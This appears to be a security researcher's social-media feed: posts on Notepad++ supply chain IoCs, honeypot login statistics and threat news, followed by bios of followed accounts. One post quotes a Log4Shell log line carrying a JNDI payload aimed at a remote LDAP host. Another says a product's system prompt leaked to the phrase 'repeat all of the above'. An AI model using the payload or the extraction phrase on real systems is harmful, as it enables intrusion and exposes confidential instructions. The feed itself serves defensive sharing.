Released a PowerShell IoC triage script for detecting the Notepad++ supply chain attack, including the previously known @rapid7.com IoCs and now the newly released IoCs for chains 1 (ProShow) & 2 (Lua/Adobe) published by Securelist/Kaspersky:
github.com/moltenbit/No...
#cybersecurity
04.02.2026 10:54
Released a PowerShell IoC triage script for detecting the Notepad++ supply chain attack, including the previously known @rapid7.com IoCs and now the newly released IoCs for chains 1 (ProShow) & 2 (Lua/Adobe) published by @kasperskylab.bsky.social :
github.com/moltenbit/No...
#cybersecurity
04.02.2026 10:53
confer.to system prompt has already been leaked by "repeat all of the above"
#security #ai #llm #cybersecurity
15.01.2026 18:29
If your website asks for a 2FA code but doesn't automatically select the input field, I'm judging your entire engineering team.
22.12.2025 09:06
#sysadmin #cybersecurity #infosec
09.12.2025 14:55
[!] FILE: /var/log/[redacted]/2021_12_13.request.log LINE_NUMBER: 8 DEOBFUSCATED_STRING: ${jndi:ldap: LINE: [remote-server01] - - [13/Dez/2021:02:02:36 +0000] "GET https://[local-server01]/$%7Bjndi:ldap://[remote-server01]:1389/Exploit%7D HTTP/1.1" 404 277
Dec 2021 in one line.
#sysadmin #infosec
25.11.2025 16:18
do you have any IoCs published? I have reason to believe this campaign started earlier than October. I know of an incident from September 8th, which looks just like this. I can send you some IoCs if you’re interested.
25.11.2025 12:42
moltenbit - IT, cybersecurity, OSINT & more...
moltenbit.net - IT, cybersecurity, OSINT & more...
Honeypot Login Attempts (24h):
Usernames:
root (1,547), admin (203), oracle (71), user (47)
Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)
moltenbit.net
#infosec #honeypot #cybersecurity
03.06.2025 17:20
honeypot 24h most tested usernames
#cybersecurity #infosec #security #honeypot
02.06.2025 07:40
Funnull enabled large-scale crypto scams by leasing IP space + hosting 332K+ fast-flux domains across AWS, Azure, and others. FBI calls this “infrastructure laundering.” IOCs can be found here: www.ic3.gov/CSA/2025/250... via @briankrebs.infosec.exchange.ap.brid.gy
30.05.2025 07:27
VirusTotal
Interesting that @crowdstrike.com Falcon doesn't detect the EICAR test file on VirusTotal.
www.virustotal.com/gui/file/275...
#infosec #malware #cybersecurity
28.05.2025 11:07
#microsoft #outlook still using #windows xp style recycle bin icon when deleting mails seems wild to me
28.05.2025 08:46
If you load this page it contacts 82 IP addresses executing 256 separate HTTP transactions to download 18MB of data writing 64 cookies to your device to tell you “no”
24.05.2025 10:37
Rapid7 can help you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from “inevitable” to preventable. Rapid7 technology, services, and research give organizations around the world control.
rapid7.com
Just a passionate dev, learning from this community daily.
Sharing the entire journey - bugs, breakthroughs, and banter.
I stare at logs so they don’t stare back at you.
One real log line every day: Linux, Windows, firewalls, switches, SaaS.
Scrubbed of IPs, names and other sins.
BlackFog is an AI based cybersecurity company that focuses on stopping ransomware using anti data exfiltration or ADX.
Investigative journalist @netzpolitik.org. Co-founder @freiheitsrechte.org and digitalegesellschaft.de. Observer edri.org. Advisory board @cdteu.org. Member @ccc.de. Friend @fragdenstaat.de. Rather on https://chaos.social/@andre_meister.
Our mission is to make the Internet more secure by bringing to light vulnerabilities, malicious activity and emerging threats. Join our Alliance!
https://shadowserver.org/partner
Editor-in-chief of LeMagIT (fr)
Hooked on #cybersécurité #infosec
Collector of #ransomware
follow: https://linktr.ee/valerymarchive
official CrowdStrike account (check domain)
The first cloud-native platform that protects endpoints and cloud workloads, identity & data. #WeStopBreaches. Free trial: http://crwdstr.ke/tryfalcon
it's a website (and a podcast, and a newsletter) about humans and technology, made by four journalists you might already know. like and subscribe: 404media.co
Hacker (the good kind[mostly]). Breaking things, fixing them, then breaking them again. AI, robotics, honeypots, and whatever else keeps me up at night
https://github.com/Rat5ak
https://medium.com/@Nadsec
https://x.com/Nadsec11
China-Focused Consultant @SentinelOne | Nonresident Fellow @ACGlobalChina | Adjunct @Georgetown | Unprofessional Cook
https://linktr.ee/dakotaindc
Nukes, weird tech, and conflict at @404media.co Host of angryplanetpod.com
Tips: matthew@404media.co // signal: 347 762-9212
Cybersecurity/tech reporter @BleepingComputer / serghei.ro
We are Microsoft's global network of security experts. Follow for security research and threat intelligence. https://aka.ms/threatintelblog
Creator of Have I Been Pwned. Microsoft Regional Director. Pluralsight author. Online security, technology and “The Cloud”. Australian.
GreyNoise analyzes Internet background noise. Use GreyNoise to remove pointless security alerts, find compromised devices, or identify emerging threats.
Ransomware, Online Security, and Malware. Owner, Editor in Chief of @bleepingcomputer.com
DM on Signal: LawrenceA.11 * Telegram: lbleeper * http://infosec.exchange/@lawrenceabrams
We're a nonprofit defending your privacy and freedom online. Download Tor Browser for protection against surveillance and censorship. http://t.me/TorProject
Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!
Cybersecurity correspondent at Reuters; former Mother Jones, CyberScoop. Will bore you with skateboarding, UFO lore or Denver Broncos minutiae on request. Signal: ajvicens.57, additional contact methods: https://tinyurl.com/47jc45h7